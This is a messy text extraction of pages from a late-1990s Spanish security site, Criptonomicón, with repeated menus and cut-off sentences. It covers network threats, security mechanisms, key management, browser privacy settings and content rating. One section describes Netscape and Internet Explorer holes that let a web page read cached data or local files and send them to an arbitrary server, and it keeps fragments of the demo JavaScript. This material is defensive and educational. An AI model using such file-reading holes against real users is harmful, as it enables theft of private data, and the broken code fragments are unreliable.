JavaScript
Introduccin
SSL
S-HTTP
SSL vs S-HTTP
Certificados
Cmo obterner uno
Por su parte, los protocolos S-HTTP estn integrados con HTTP. Aqu, los servicios
de seguridad se negocian a travs de las cabeceras y atributos de la pgina. Por lo
tanto, los servicios de S-HTTP estn disponibles slo para las conexiones de HTTP.
Dado que SSL se integra en la capa de sockets, tambin permite ser usado por otros
protocolos adems del HTTP, mientras que el S-HTTP est concebido para ser usado
exclusivamente en comuniciones HTTP.
Cookies
Crashes
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Agujeros
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Introduccin
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
SSL
S-HTTP
SSL vs S-HTTP
Certificados
Referencias
Libro de Visitas
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Servicios de seguridad
Suscripcin gratis
Intimidad?
Servicios de seguridad
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Introduccin
Servicios de seguridad
Consejos prcticos
Referencias
Libro de Visitas
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Suscripcin gratis
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Mecanismos de
seguridad
Gestin de claves
Las cuatro categoras generales de amenazas o ataques son las siguientes (v. Figura):
Agujeros
Spam
Remailers
Correo seguro
Web seguro
Servicios de
seguridad
Crashes
Anonimato
Amenazas a la
seguridad
Referencias
Libro de Visitas
Ataques pasivos
En los ataques pasivos el atacante no altera la comunicacin, sino que nicamente la
escucha o monitoriza, para obtener informacin que est siendo transmitida. Sus
objetivos son la intercepcin de datos y el anlisis de trfico, una tcnica ms sutil
para obtener informacin de la comunicacin, que puede consistir en:
Obtencin del origen y destinatario de la comunicacin, leyendo las
cabeceras de los paquetes monitorizados.
Control del volumen de trfico intercambiado entre las entidades
monitorizadas, obteniendo as informacin acerca de actividad o inactividad
inusuales.
Control de las horas habituales de intercambio de datos entre las entidades
de la comunicacin, para extraer informacin acerca de los perodos de
actividad.
Los ataques pasivos son muy difciles de detectar, ya que no provocan ninguna
alteracin de los datos. Sin embargo, es posible evitar su xito mediante el cifrado de
la informacin y otros mecanismos que se vern ms adelante.
Ataques activos
Estos ataques implican algn tipo de modificacin del flujo de datos transmitido o la
creacin de un falso flujo de datos, pudiendo subdividirse en cuatro categoras:
Suplantacin de identidad: el intruso se hace pasar por una entidad diferente.
Normalmente incluye alguna de las otras formas de ataque activo. Por
ejemplo, secuencias de autenticacin pueden ser capturadas y repetidas,
permitiendo a una entidad no autorizada acceder a una serie de recursos
privilegiados suplantando a la entidad que posee esos privilegios, como al
robar la contrasea de acceso a una cuenta.
Reactuacin: uno o varios mensajes legtimos son capturados y repetidos para
producir un efecto no deseado, como por ejemplo ingresar dinero repetidas
veces en una cuenta dada.
Modificacin de mensajes: una porcin del mensaje legtimo es alterada, o
los mensajes son retardados o reordenados, para producir un efecto no
autorizado. Por ejemplo, el mensaje Ingresa un milln de pesetas en la cuenta
A podra ser modificado para decir Ingresa un milln de pesetas en la cuenta
B.
Degradacin fraudulenta del servicio: impide o inhibe el uso normal o la
gestin de recursos informticos y de comunicaciones. Por ejemplo, el intruso
podra suprimir todos los mensajes dirigidos a una determinada entidad o se
podra interrumpir el servicio de una red inundndola con mensajes espurios.
Entre estos ataques se encuentran los de denegacin de servicio, consistentes
file:///C|/TEMP/criptonomicon/criptonomicon/amenazas.html (2 of 3) [25/10/2000 02:31:20 p.m.]
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Mecanismos de seguridad
Suscripcin gratis
Intimidad?
Mecanismos de seguridad
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Introduccin
Mecanismos de seguridad
Consejos prcticos
Referencias
Libro de Visitas
con el que le llega, para verificar que los datos no han sido modificados.
Firma digital: este mecanismo implica el cifrado, por medio de la clave
secreta del emisor, de una cadena comprimida de datos que se va a transferir.
La firma digital se enva junto con los datos ordinarios. Este mensaje se
procesa en el receptor, para verificar su integridad. Juega un papel esencial en
el servicio de no repudio.
Control de acceso: esfuerzo para que slo aquellos usuarios autorizados
accedan a los recursos del sistema o a la red, como por ejemplo mediante las
contraseas de acceso.
Trfico de relleno: consiste en enviar trfico espurio junto con los datos
vlidos para que el atacante no sepa si se est enviando informacin, ni qu
cantidad de datos tiles se est transmitiendo.
Control de encaminamiento: permite enviar determinada informacin por
determinadas zonas consideradas clasificadas. Asimismo posibilita solicitar
otras rutas, en caso que se detecten persistentes violaciones de integridad en
una ruta determinada.
Unicidad: consiste en aadir a los datos un nmero de secuencia, la fecha y
hora, un nmero aleatorio, o alguna combinacin de los anteriores, que se
incluyen en la firma digital o integridad de datos. De esta forma se evitan
amenazas como la reactuacin o resecuenciacin de mensajes.
Los mecanismos bsicos pueden agruparse de varias formas para proporcionar los
servicios previamente mencionados. Conviene resaltar que los mecanismos poseen
tres componentes principales:
Una informacin secreta, como claves y contraseas, conocidas por las
entidades autorizadas.
Un conjunto de algoritmos, para llevar a cabo el cifrado, descifrado, hash y
generacin de nmeros aleatorios.
Un conjunto de procedimientos, que definen cmo se usarn los algoritmos,
quin enva qu a quin y cundo.
Asimismo es importante notar que los sistemas de seguridad requieren una gestin de
seguridad. La gestin comprende dos campos bien amplios:
Seguridad en la generacin, localizacin y distribucin de la informacin
secreta, de modo que slo pueda ser accedida por aquellas entidades
autorizadas.
La poltica de los servicios y mecanismos de seguridad para detectar
infracciones de seguridad y emprender acciones correctivas.
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Gestin de claves
Suscripcin gratis
Intimidad?
Gestin de claves
Artculos
Seguridad
Introduccin
Amenazas a la
seguridad
Generacin de claves
Mecanismos de
seguridad
Linux
Navegacin segura
Control de acceso
Servicios de
seguridad
Gestin de claves
La seguridad de un algoritmo descansa en la clave. Un
criptosistema que haga uso de claves criptogrficamente dbiles ser l mismo dbil.
Algunos aspectos a considerar que se presentan a la hora de la eleccin de las claves
son:
CGI
JavaScript
Cookies
Agujeros
Cuando los usuarios eligen sus claves, la eleccin suele ser muy pobre en general
(por ejemplo, el propio nombre o el de la mujer), hacindolas muy dbiles para un
ataque de fuerza bruta que primero pruebe las claves ms obvias (ataque de
diccionario).
Spam
Claves aleatorias
Remailers
Anonimato
Correo seguro
Web seguro
Claves buenas son las cadenas de bits aleatorios generadas por medio de algn
proceso automtico (como una fuente aleatoria fiable o un generador
pseudo-aleatorio criptogrficamente seguro), de forma que si la clave consta de 64
bits, las 264 claves posibles sean igualmente probables. En el caso de los
criptosistemas de clave pblica, el proceso se complica, ya que a menudo las claves
deben verificar ciertas propiedades matemticas (ser primos dos veces seguros,
residuos cuadrticos, etc.).
Frases de paso
Gestin de claves
Consejos prcticos
Referencias
Libro de Visitas
Distribucin de claves
Sin duda alguna, el problema central de todo sistema de gestin de claves lo
constituyen los procedimientos de distribucin de stas. Esta distribucin debe
efectuarse previamente a la comunicacin. Los requisitos especficos en cuanto a
seguridad de esta distribucin dependern de para qu y cmo van a ser utilizadas las
claves. As pues, ser necesario garantizar la identidad de su origen, su integridad y,
en el caso de claves secretas, su confidencialidad.
Las consideraciones ms importantes para un sistema de gestin de claves son el tipo
de ataques que lo amenazan y la arquitectura del sistema. Normalmente, es necesario
que la distribucin de claves se lleve a cabo sobre la misma red de comunicacin
donde se est transmitiendo la informacin a proteger. Esta distribucin es
automtica y la transferencia suele iniciarse con la peticin de clave por parte de una
entidad a un Centro de Distribucin de Claves (intercambio centralizado) o a la otra
entidad involucrada en la comunicacin (intercambio directo). La alternativa es una
distribucin manual (mediante el empleo de correos seguros, por ejemplo),
independiente del canal de comunicacin. Esta ltima alternativa implica un alto
coste econmico y un tiempo relativamente largo para llevarse a cabo, lo que la hace
descartable en la mayora de las situaciones. La distribucin segura de claves sobre
canal inseguro requiere proteccin criptogrfica y, por tanto, la presencia de otras
claves, conformando una jerarqua de claves. En cierto punto se requerir proteccin
no criptogrfica de algunas claves (llamadas maestras), usadas para intercambiar con
los usuarios de forma segura las claves que usarn en su(s) futura(s)
comunicacin(es). Entre las tcnicas y ejemplos no criptogrficos podemos citar
seguridad fsica y confianza.
La distribucin de claves se lleva siempre a cabo mediante protocolos, es decir,
secuencias de pasos de comunicacin (transferencia de mensajes) y pasos de
computacin. Muchas de las propiedades de estos protocolos dependen de la
estructura de los mensajes intercambiados y no de los algoritmos criptogrficos
subyacentes. Por ello, las debilidades de estos protocolos provienen normalmente de
errores cometidos en los niveles ms altos del diseo.
Las claves criptogrficas temporales usadas durante la comunicacin, llamadas
claves de sesin, deben ser generadas de forma aleatoria. Para protegerlas ser
necesaria seguridad fsica o cifrado mediante claves maestras, mientras que para
evitar que sean modificadas deber utilizarse seguridad fsica o autenticacin. La
autenticacin hace uso de parmetros como time-stamps y contadores para protegerse
tambin contra la reactuacin con antiguas claves.
Gestin de claves
Almacenamiento de claves
En sistemas con un solo usuario, la solucin ms sencilla pasa por ser su retencin en
la memoria del usuario. Una solucin ms sofisticada y que desde luego funcionar
mejor para claves largas, consiste en almacenarlas en una tarjeta de banda magntica,
en una llave de plstico con un chip ROM (ROM key) o en una tarjeta inteligente, de
manera que el usuario no tenga ms que insertar el dispositivo empleado en alguna
ranura a tal efecto para introducir su clave.
Otra manera de almacenar claves difciles de recordar es en forma encriptada
mediante una clave fcil de recordar, como por ejemplo almacenar en disco la clave
privada RSA cifrada mediante una clave DES.
Gestin de claves
mejor que andar descifrando y volviendo a cifrar los ficheros con una nueva clave
todos los das, sera cifrar cada fichero con una nica clave y despus cifrar todas las
claves con una clave maestra, que deber ser almacenada en un lugar de alta
seguridad, ya que su prdida o compromiso echara a perder la confidencialidad de
todos los ficheros.
Destruccin de claves
Las claves caducadas deben ser destruidas con la mayor seguridad, de modo que no
caigan en manos de un adversario, puesto que con ellas podra leer los mensajes
antiguos. En el caso de haber sido escritas en papel, ste deber ser debidamente
destruido; si haban sido grabadas en una EEPROM, deber sobreescribirse mltiples
veces, y si se encontraba en EPROM, PROM o tarjeta de banda magntica, debern
ser hechas aicos (muy pequeitos, a poder ser). En funcin del dispositivo
empleado, deber buscarse la forma de que se vuelvan irrecuperables.
Las ideas de esta seccin sobre gestin de claves han sido extradas del libro "Applied Cryptography", por Bruce Schneier.
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
file:///C|/TEMP/criptonomicon/criptonomicon/images/amenazas.gif
Suscripcin gratis
Intimidad?
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
gran variedad de aplicaciones que sean escritas para entornos basados en la Web. Las
aplicaciones de compra por Internet pueden as almacenar informacin como los
artculos seleccionados, los servicios de pago pueden reenviar la informacin de
registro y as liberar al cliente de reescribir el login y password la prxima vez que se
conecte, los sitios pueden guardar las preferencias de cada usuario en el propio
cliente y hacer que el cliente suministre esas preferencias cada vez que se conecte a
ese sitio.
Volver a la Pgina anterior.
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Intimidad?
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Microsoft Wallet
Microsoft Wallet
Qu es Microsoft Wallet?
Con Microsoft Wallet 3.0 puede almacenar en su PC informacin
sobre la direccin y el mtodo de pago que utilizar en las
transacciones de compra en lnea. Puede considerar Microsoft
Wallet como el equivalente electrnico de la cartera que
posiblemente lleve consigo en el bolso o en un bolsillo para
transportar las tarjetas de crdito y su identificacin.
General
Seguridad
Contenido
Conexin
Programas
Opciones avanzadas
Microsoft Wallet facilita las compras en Internet al permitirle
especificar la direccin y el mtodo de pago una nica vez. A
partir de entonces, esa informacin queda almacenada en el equipo y podr
transmitirla a tiendas de Internet compatibles con Wallet cuando se le solicite la
direccin de envo o los datos de la tarjeta de crdito al realizar alguna compra. No es
necesario volver a escribir esta informacin cada vez que realice una compra, como
tendra que hacer en las tiendas que utilizan los mtodos tradicionales. Para enviar o
cargar compras a diferentes ubicaciones (por ejemplo, a casa o a la oficina), puede
almacenar fcilmente estas direcciones diferentes en Wallet y seleccionar una de
ellas durante el proceso de compra utilizando un nombre sencillo, como "Casa de
Juan". Si dispone de varias tarjetas de crdito, puede introducirlas y almacenarlas con
un nombre descriptivo, como "Visa de Mara".
Microsoft Wallet
direcciones a las que enviar y facturar un pedido en lnea. Los nombres, direcciones
de correo electrnico y nmeros de telfono de los usuarios de Wallet pueden verse
en la Libreta de direcciones.
Utilice Payment Manager para introducir, almacenar de forma segura y tener acceso
a diversos tipos de mtodos de pago para abonar las compras en lnea. Esta
informacin est protegida por una contrasea definida por el usuario. Al comprar en
una tienda de Internet compatible con Microsoft Wallet, el sitio puede pedirle que
seleccione los mtodos de pago almacenados en Wallet y que autorice el pago
mediante la introduccin de la contrasea.
Microsoft Wallet
enviada, de manera que slo el banco del comerciante puede leerla, quedando
inaccesible incluso para el propio comerciante. Microsoft se encuentra actualmente
desarrollando una extensin para Microsoft Wallet que soporte el protocolo SET.
Nota: en Windows NT, Microsoft Wallet necesita privilegios de administrador tanto para su
instalacin como para su uso. Para permitir que Wallet funcione mientras se encuentra conectado
como un usuario distinto de administrador, debe aadir la cuenta de usuario al grupo de
administradores de la mquina local.
Medio
Bajo
Personalizar
file:///C|/TEMP/criptonomicon/criptonomicon/images/mseguridad.gif
Preferencias
Informacin de
seguridad
Netwatch
Carpeta Navigator
En la carpeta Navigator se ofrece la posibilidad de configurar el nmero de das
que las pginas web visitadas aparecern listadas en la ventana de historial. Esta
ventana contiene el URL o direccin de todas las pginas que se han visitado durante
el nmero de das especificado. En el caso de formularios, aparecer incluso el
contenido que se escribi en ellos. En otras palabras, cualquier persona que accediera
a esta informacin sabra qu pginas han sido visitadas, cundo y, en el caso de los
formularios, qu datos se le proporcionaron. Desgraciadamente, errores de seguridad
en este navegador, permiten a cualquier sitio de Internet obtener esta informacin de
los usuarios que lo visiten. Si no quiere que caigan en otras manos, debe establecer a
cero los das. Puede asimismo hacer la siguiente prueba: escriba
about:global
en la ventana de direccin y compruebe cmo aparece en la ventana del navegador la
lista completa de los ltimos sitios que ha visitado. Observe cmo si rellen algn
formulario, tambin aparecern los datos suministrados (siempre y cuando el mtodo
de envo de datos del formulario fuera GET).
En la versin 4.5 aparece adems la opcin de limpiar el contenido de la barra de
direccin (los sitios que aparecen en una lista desplegable al pulsar la flecha de la
derecha). Al igual que en el caso anterior, se muestran las direcciones de las pginas
ms recientemente visitadas, con la posibilidad de que cualquiera que se siente a
ratn sobre una imagen o cargar una pgina (es interesante la visita a la pgina de
envo de correo para un ilustrativo ejemplo de esta posibilidad). En este caso, se
enviar el correo con la direccin y nombre introducido en esta ventana. En las
versiones de Communicator 4.x, antes de enviar el correo se le pide confirmacin al
usuario, pero son muchos los usuarios que bien porque han adquirido el hbito de
decir que s a todo, bien porque no entienden o no leen el contenido de la ventana de
confirmacin, lo cierto es que envan su direccin indiscriminadamente. Siempre se
debe leer atentamente cada ventana que aparece antes de emprender acciones que
puedan comprometer la seguridad. Algunos usuarios introducen datos falsos, lo cual
puede ser una buena idea para contrarrestar el problema anterior, si bien no lo es
tanto para falsificar correos, ya que quedar un rastro debido a la direccin IP de la
mquina desde la que se enviaron. No obstante, puede servir para engaar en un
primer momento a un usuario poco observador.
La opcin Servidor de correo permite determinar el lugar del disco duro
donde se almacenar todo el correo recibido, enviado, borrado, etc. Normalmente,
existe un lugar por defecto que conviene cambiar, ya que existen muchos agujeros en
los navegadores que facilitan a sitios web remotos el examen del contenido de
archivos en el disco duro cuyo nombre y localizacin se conocen. Si uno no se
molesta en cambiar el lugar donde se guarda todo el correo, cualquier servidor web
que se interese en ello puede leerlo, tanto el enviado como el recibido. No cuesta
nada cambiar la localizacin por defecto a otro lugar en el disco duro y aadir
seguridad. Tambin se ofrece la posibilidad de guardar la contrasea de acceso al
servidor de correo. Piense que si activa esta casilla, cualquier persona con acceso a su
navegador podr leer los futuros correos que reciba mientras usted no est presente,
mientras que en caso contrario, se le pedir la contrasea cada vez que inicia una
nueva sesin con el servidor.
En la opcin Mensajes en las versiones 4.0x y Copias y carpetas en 4.5, se
ofrece la posibilidad de enviar a terceras personas copias de los correos mandados al
exterior. Conviene tener presente que si se utiliza Netscape desde el trabajo, el jefe
puede haber introducido ah su direccin de correo para recibir una copia de cada
mensaje enviado y asegurarse as del buen uso de Internet que hacen sus empleados
en horas laborales.
Tambin existe la posibilidad de especificar dnde se almacenarn los correos
enviados, si es que se quieren guardar en disco. Nunca hay que perder de vista el
hecho de que en sistemas Windows, siempre que no se utilice alguna herramienta de
cifrado, cualquiera puede acceder al contenido del disco duro, por lo que se podra
leer el contenido de los correos. Si no se cambia el directorio por defecto donde se
almacenan, como se ha explicado anteriormente, entonces no slo las personas con
acceso fsico al ordenador, sino cualquier mquina conectada a Internet podra leerlos
explotando algunos de los agujeros del navegador.
Carpeta Avanzadas
Por defecto, Java y JavaScript aparecen activados tras la instalacin del programa. Si
Preferencias
Informacin de
seguridad
Netwatch
En Java/JavaScript se administran los permisos con los que las applets de Java
y los programas en JavaScript que estn firmados correctamente accedern a su
sistema. Resulta extremadamente peligroso que estos programas gocen de privilegios
excesivos, como lectura/escritura en disco o posibilidad de conexiones a travs de
Internet. Por este motivo, resulta ms seguro, aunque tambin ms engorroso,
eliminar de la lista los sitios web, los vendedores y los distribuidores que estn
presentes, o cuando menos editar y verificar sus permisos, eliminando los que
requieran privilegios de ms alto riesgo, de manera que en el futuro se le pida
autorizacin cada vez que se pretenda realizar una operacin comprometida, en vez
de concederla automticamente.
En Certificados se gestionan los certificados con los que opera Navigator, tanto
los propios, para que usted se identifique ante otras personas o pginas web, como
los ajenos, para que otros se identifiquen ante usted. Adems aparecen los
certificados que ha aceptado de sitios web, as como los de las entidades firmantes,
que dan validez a todos los certificados anteriores. Conviene que los proteja con
contrasea, como se describi ms arriba. Adems es muy recomendable que realice
copias de sus certificados y los conserve en un sitio seguro, ya que si los pierde o
borra accidentalmente, ser incapaz de leer el correo cifrado recibido ni se podr
identificar ante los sitios web. Para ms informacin, consulte la pgina Obtener un
certificado.
En Mdulos Criptogrficos se pueden aadir mdulos criptogrficos para
Netwatch
Netwatch
NetWatch es la proteccin basada en restricciones por contenidos
incorporada por Netscape Navigator 4.5, que le permitir
controlar qu clase de pginas web se pueden visualizar en su
ordenador.
Preferencias
Informacin de
seguridad
Netwatch
NetWatch de Netscape utiliza el estndar de clasificacin
conocido como PICS. NetWatch reconoce dos sistemas de clasificacin
independientes compatibles con PICS: RSACi, y SafeSurf. Cada sistema emplea un
mtodo diferente para describir con el mayor detalle posible los niveles de contenido
potencialmente ofensivo en las pginas web. Estos contenidos se agrupan en las
siguientes categoras: violencia, desnudez, sexo y lenguaje. SafeSurf aade, adems,
otros contenidos, como profanidad, heterosexualidad, homosexualidad, intolerancia
racial, sexual o religiosa, drogas, juego, etc.
Una vez que la proteccin de NetWatch ha sido activada, cuando se accede a una
pgina con Netscape Navigator, NetWatch compara la clasificacin de la pgina con
los niveles que han sido configurados como aceptables y si todos los niveles de la
pgina son inferiores se permite su visualizacin. Tambin se puede bloquear todas
las pginas que carezcan de clasificacin, si bien esta opcin limitara drsticamente
la navegacin por Internet, ya que son muy pocas las pginas que actualmente
incorporan clasificacin.
Con el fin de evitar que otros usuarios vean o cambien su configuracin, sta se
protege mediante una contrasea. A partir del momento en que se activa la
proteccin de NetWatch, nadie que use su navegador podr saltrsela.
Puede configurar NetWatch si lo desea, seleccionando el comando NetWatch del
men Ayuda.
Netwatch
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
PICS
PICS
Restriccin de contenidos en Internet sin censura
Preferencias
Informacin de
Del mismo modo que no todo el contenido que se emite por TV es
seguridad
apropiado para todas las audiencias, no todas las pginas Web
estn hechas para todos los ojos: sexo, violencia, lenguaje de mal
Netwatch
gusto, desnudez, racismo... A la censura en Internet le gustara con
toda seguridad prohibir pginas con tales contenidos. Afortunadamente, antes de que
los gobiernos llegaran a esos extremos, se desarroll la especificacin PICS
(Plataforma para la Seleccin de Contenido en Internet), que permite la asociacin de
etiquetas (metadatos) con el contenido de las pginas Web en Internet. Fue diseado
originalmente para ayudar a los padres, educadores y empresarios a controlar el
contenido al que acceden los nios o los empleados, filtrando todo aquello que
consideren inapropiado para ellos. PICS facilita tambin otras aplicaciones de
etiquetado, como la descripcin del contenido de las pginas Web, la firma de cdigo
y la privacidad.
La plataforma establece las convenciones que deben seguir los formatos de etiquetas
y los mtodos de distribucin, sin pronunciarse en absoluto acerca del vocabulario de
las etiquetas o quin debera prestar atencin a qu etiquetas. Resulta anlogo a
especificar dnde debera aparecer una etiqueta de advertencia en un paquete de
tabaco y con qu tipo de letra, pero sin especificar lo que debe decir ni quin debe
hacerle caso.
Para ms informacin se puede acudir a la pgina Web de la plataforma.
file:///C|/TEMP/criptonomicon/criptonomicon/images/navigator.gif
Artculos
Seguridad
Linux
Navegacin segura
Control de acceso
CGI
Java
JavaScript
Cookies
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Crashes
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Intimidad?
Artculos
Seguridad
Linux
Lectura de directorios
Brumleve
Quiero ver lo chungo que tambin lo tiene el Explorer
Navegacin segura
Control de acceso
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
CGI
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
Java
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Existe un agujero en Netscape Communicator 4.07 (Win95), 4.05 (WinNT 4.0) (y probablemente otros)
que permite leer el cache de un usario (incluyendo la informacin en los formularios enviados con
GET). Esta informacin podra ser enviada a un sercidor arbitrario, incluso aunque el usuario se
encuentre detrs de un firewall.
Parte del cdigo lo he tomado prestado de Dan Brumleve (nothing@shout.net).
Solucin: Desactivar Javascript.
Puedes comprobar el agujero que permite leer el cache.
Traduccin de la pgina de Georgi Guninski.
Submit
Existe un agujero en Netscape Communicator 4.07 (Win95), 4.05 (WinNT 4.0) (y probablemente otros)
que permite leer el cache de un usario (incluyendo la informacin en los formularios enviados con GET).
Tambin es posible leer los contenidos de directorios. Esta informacin podra ser enviada a un sercidor
arbitrario.
Solucin: Desactivar Javascript.
';return s};f()"; sl2.location.reload();
Traduccin de la pgina de Georgi Guninski
Existe un agujero en Netscape Communicator 4.5, 4.07, 3.04 for Windows 95 (y probablemente otros)
que permite leer el cache de un usario (incluyendo la informacin en los formularios enviados con GET).
Tambin es posible leer los contenidos de directorios. Esta informacin podra ser enviada a un sercidor
arbitrario.
Solucin: Desactivar Javascript.
';return s};f()"; sl2.location.reload();
Traduccin de la pgina de Georgi Guninski
Existe un agujero en Netscape Communicator 4.5 para Windows 95 (y probablemente otros) que permite
leer ficheros del disco duro de un usuario. No es necesario conocer el nombre del fichero, dado que se
pueden examinar los directorios. Los contenidos del fichero se podran enviar a un host arbitrario. Para
que funcione, se necesita que tanto Java como JavaScript estn activados.
Solucin: Desactivar Javascript o Java.
Traduccin de la pgina de Georgi Guninski
'";
Existe un agujero en Netscape Communicator 4.5 para mquinas Unix que permite leer ficheros del disco
duro de un usuario. No es necesario conocer el nombre del fichero, dado que se pueden examinar los
directorios. Los contenidos del fichero se podran enviar a un host arbitrario. Para que funcione, se
necesita que tanto Java como JavaScript estn activados.
Solucin: Desactivar Javascript o Java.
Adaptacin para Unix del agujero descrito en la pgina de Georgi Guninski
'";
Intimidad?
Artculos
Guninsky
Seguridad
Linux
Navegacin segura
Control de acceso
Cuartango
Quiero ver lo chungo que tambin lo tiene Netscape
CGI
Copyright 1997-1998 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Java
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad.
JavaScript
Cookies
Crashes
Agujeros
Spam
Remailers
Anonimato
Correo seguro
Web seguro
Referencias
Libro de Visitas
Intentando colgar IE
Intentando colgar IE
Agujero descubierto por Georgi Guninski
Intentando colgar IE
Esta pgina demuestra un agujero en IE 3, 4.0, 4.01, que permite leer un fichero de texto o HTML del
disco duro del usuario.
Otra forma de explotar este agujero es enviando un mensaje especialmente diseado a un usuario de
Outlook Express/IE4.
Para ver en funcionamiento este agujero, crea el fichero c:\test.txt y sus contenidos se mostrarn en una
ventana de alerta. El fichero podra ser enviado a un servidor arbitrario incluso detrs de un firewall.
Para probarlo, debes tener activado Javascript.
Esta pgina es una traducin de la pgina creada por Georgi Guninski.
Netscape
Communicator
Intenet Explorer
Existe solucin?
El 23 de enero de 1998 la compaa Netscape Communications
realiz dos importantes anuncios pblicos: primero, que su producto ms conocido y
extendido entre los usuarios de Internet, Netscape Communicator, sera gratuito y se
podra descargar desde su web; y segundo, que el cdigo fuente del Communicator
sera tambin de dominio pblico y gratis, pudindose descargar desde la web de la
Organizacin Mozilla.
Netscape Communicator
Intenet Explorer
Existe solucin?
Existe solucin?
Existe solucin?
Netscape Communicator
Intenet Explorer
Consejos para
administradores
Consejos para
usuarios
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos para
administradores
Consejos para
usuarios
Cuando navegues por un sitio seguro con Internet Explorer, encontrars dos
indicaciones: un candado cerrado en la parte inferior central de la barra de estado y el
cambio al protocolo https, en la ventana de direccin. Para saber con cuntos bits de
clave est utilizando Internet Explorer, no tienes ms que pasar el ratn por encima,
sin necesidad de pinchar en l. Si haces doble clic, aparecer una ventana con
informacin sobre el certificado del sitio web seguro. En el campo "Tipo de
encriptacin" se dan los detalles de algoritmos y longitud de claves.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos para
administradores
Consejos para
usuarios
Tienes algn consejo o truco que te gustara compartir con otros usuarios?
Envamelo y aparecer publicado con tu nombre.
Copyright 1997-1999 Gonzalo lvarez Maran, CSIC. Todos los derechos reservados.
Criptonomicn es un servicio ofrecido libremente desde el Instituto de Fsica Aplicada del CSIC. Para informacin sobre
privacidad, por favor consulte la declaracin de poltica sobre privacidad. Para sugerencias, comentarios o quejas, acuda al libro de
visitas. Para contribuir al Criptonomicn, lea la pgina de contribuciones.
Consejos para
administradores
Consejos para
usuarios
Con este valor conseguiremos que no se pueda apagar un sistema NT sin iniciar una
